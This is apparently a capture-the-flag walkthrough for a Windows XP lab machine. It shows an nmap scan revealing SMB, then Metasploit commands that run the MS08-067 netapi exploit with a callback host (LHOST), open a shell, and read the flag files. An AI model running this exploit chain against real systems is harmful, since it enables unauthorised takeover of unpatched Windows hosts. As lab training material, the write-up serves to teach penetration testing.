Enumeration
Port Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
$ cat nmap/initial.nmap
# Nmap 7.91 scan initiated Wed Feb 17 20:35:39 2021 as: nmap -sC -sV -oA nmap/initial 10.129.100.11
Nmap scan report for 10.129.100.11
Host is up (0.079s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h57m41s, deviation: 1h24m51s, median: 4d23h57m41s
|_nbstat: NetBIOS name: nil, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:56:9b (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2021-02-23T05:33:34+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 17 20:36:43 2021 -- 1 IP address (1 host up) scanned in 64.06 seconds
Exploitation
Search
1
2
3
4
5
6
7
8
9
10
$ msfdb start
$ msfconsole
msf6 > search ms08_067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
Exploit
1
2
3
4
5
6
7
msf6 > use windows/smb/ms08_067_netapi
msf6 > set RHOSTS 10.129.100.11
msf6 > set LHOST 10.10.14.146
msf6 > exploit
shell
$ cd C:\Documents and Settings\john\Desktop>
User Flag:
type user.txt
1
$ cd C:\Documents and Settings\Administrator\Desktop>
Root Flag:
type root.txt